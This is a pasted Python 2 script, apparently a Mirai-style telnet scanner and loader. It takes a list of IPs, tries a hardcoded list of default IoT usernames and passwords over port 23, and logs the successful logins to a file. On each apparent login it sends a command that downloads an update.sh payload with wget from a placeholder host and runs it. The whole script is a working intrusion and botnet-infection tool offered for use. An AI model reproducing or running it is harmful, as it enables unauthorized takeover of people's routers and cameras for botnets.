SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/usr/bin/python | |
| 2 | import threading | |
| 3 | import sys, os, re, time, socket | |
| 4 | from Queue import * | |
| 5 | from sys import stdout | |
| 6 | ||
| 7 | if len(sys.argv) < 4: | |
| 8 | print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>" | |
| 9 | sys.exit() | |
| 10 | ||
| 11 | combo = [ | |
| 12 | "root:root", | |
| 13 | "root:", | |
| 14 | "admin:admin", | |
| 15 | "support:support", | |
| 16 | "user:user", | |
| 17 | "admin:", | |
| 18 | "admin:password", | |
| 19 | "root:vizxv", | |
| 20 | "root:admin", | |
| 21 | "root:xc3511", | |
| 22 | "root:888888", | |
| 23 | "root:xmhdipc", | |
| 24 | "root:default", | |
| 25 | "root:juantech", | |
| 26 | "root:123456", | |
| 27 | "root:54321", | |
| 28 | "root:12345", | |
| 29 | "root:pass", | |
| 30 | "ubnt:ubnt", | |
| 31 | "root:klv1234", | |
| 32 | "root:Zte521", | |
| 33 | "root:hi3518", | |
| 34 | "root:jvbzd", | |
| 35 | "root:anko", | |
| 36 | "root:zlxx.", | |
| 37 | "root:7ujMko0vizxv", | |
| 38 | "root:7ujMko0admin", | |
| 39 | "root:system", | |
| 40 | "root:ikwb", | |
| 41 | "root:dreambox", | |
| 42 | "root:user", | |
| 43 | "root:realtek", | |
| 44 | "root:00000000", | |
| 45 | "admin:1111111", | |
| 46 | "admin:1234", | |
| 47 | "admin:12345", | |
| 48 | "admin:54321", | |
| 49 | "admin:123456", | |
| 50 | "admin:7ujMko0admin", | |
| 51 | "admin:1234", | |
| 52 | "admin:pass", | |
| 53 | "admin:meinsm", | |
| 54 | "admin:admin1234", | |
| 55 | "root:1111", | |
| 56 | "admin:smcadmin", | |
| 57 | "admin:1111", | |
| 58 | "root:666666", | |
| 59 | "root:password", | |
| 60 | "root:1234", | |
| 61 | "root:klv123", | |
| 62 | "Administrator:admin", | |
| 63 | "service:service", | |
| 64 | "supervisor:supervisor", | |
| 65 | "guest:guest", | |
| 66 | "guest:12345", | |
| 67 | "guest:12345", | |
| 68 | "admin1:password", | |
| 69 | "administrator:1234", | |
| 70 | "666666:666666", | |
| 71 | "888888:888888", | |
| 72 | "tech:tech", | |
| 73 | "mother:fucker" | |
| 74 | ] | |
| 75 | ||
| 76 | ips = open(sys.argv[1], "r").readlines() | |
| 77 | threads = int(sys.argv[2]) | |
| 78 | output_file = sys.argv[3] | |
| 79 | queue = Queue() | |
| 80 | queue_count = 0 | |
| 81 | ||
| 82 | for ip in ips: | |
| 83 | queue_count += 1 | |
| 84 | stdout.write("\r[%d] Added to queue" % queue_count)
| |
| 85 | stdout.flush() | |
| 86 | queue.put(ip) | |
| 87 | print "\n" | |
| 88 | ||
| 89 | ||
| 90 | class router(threading.Thread): | |
| 91 | def __init__ (self, ip): | |
| 92 | threading.Thread.__init__(self) | |
| 93 | self.ip = str(ip).rstrip('\n')
| |
| 94 | self.rekdevice="cd /tmp; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send | |
| 95 | def run(self): | |
| 96 | global fh | |
| 97 | username = "" | |
| 98 | password = "" | |
| 99 | for passwd in combo: | |
| 100 | if ":n/a" in passwd: | |
| 101 | password="" | |
| 102 | else: | |
| 103 | password=passwd.split(":")[1]
| |
| 104 | if "n/a:" in passwd: | |
| 105 | username="" | |
| 106 | else: | |
| 107 | username=passwd.split(":")[0]
| |
| 108 | try: | |
| 109 | tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| 110 | tn.settimeout(0.37) | |
| 111 | tn.connect((self.ip,23)) | |
| 112 | except Exception: | |
| 113 | tn.close() | |
| 114 | break | |
| 115 | try: | |
| 116 | hoho = '' | |
| 117 | hoho += readUntil(tn, ":") | |
| 118 | if ":" in hoho: | |
| 119 | tn.send(username + "\r\n") | |
| 120 | time.sleep(0.1) | |
| 121 | except Exception: | |
| 122 | tn.close() | |
| 123 | try: | |
| 124 | hoho = '' | |
| 125 | hoho += readUntil(tn, ":") | |
| 126 | if ":" in hoho: | |
| 127 | tn.send(password + "\r\n") | |
| 128 | time.sleep(0.1) | |
| 129 | else: | |
| 130 | pass | |
| 131 | except Exception: | |
| 132 | tn.close() | |
| 133 | try: | |
| 134 | prompt = '' | |
| 135 | prompt += tn.recv(40960) | |
| 136 | if "#" in prompt or "$": | |
| 137 | success = True | |
| 138 | else: | |
| 139 | tn.close() | |
| 140 | if success == True: | |
| 141 | try: | |
| 142 | tn.send(self.rekdevice + "\r\n") | |
| 143 | fh.write(self.ip + ":23 " + username + ":" + password + "\n") # 1.1.1.1:23 user:pass # mirai | |
| 144 | fh.flush() | |
| 145 | print "[+] GOTCHA -> %s:%s:%s"%(username, password, self.ip) | |
| 146 | tn.close() | |
| 147 | break | |
| 148 | except: | |
| 149 | tn.close() | |
| 150 | else: | |
| 151 | tn.close() | |
| 152 | except Exception: | |
| 153 | tn.close() | |
| 154 | ||
| 155 | def readUntil(tn, string, timeout=8): | |
| 156 | buf = '' | |
| 157 | start_time = time.time() | |
| 158 | while time.time() - start_time < timeout: | |
| 159 | buf += tn.recv(1024) | |
| 160 | time.sleep(0.01) | |
| 161 | if string in buf: return buf | |
| 162 | raise Exception('TIMEOUT!')
| |
| 163 | ||
| 164 | def worker(): | |
| 165 | try: | |
| 166 | while True: | |
| 167 | try: | |
| 168 | IP = queue.get() | |
| 169 | thread = router(IP) | |
| 170 | thread.start() | |
| 171 | queue.task_done() | |
| 172 | time.sleep(0.02) | |
| 173 | except: | |
| 174 | pass | |
| 175 | except: | |
| 176 | pass | |
| 177 | ||
| 178 | global fh | |
| 179 | fh = open("workingtelnet.txt","a")
| |
| 180 | for l in xrange(threads): | |
| 181 | try: | |
| 182 | t = threading.Thread(target=worker) | |
| 183 | t.start() | |
| 184 | except: | |
| 185 | pass |
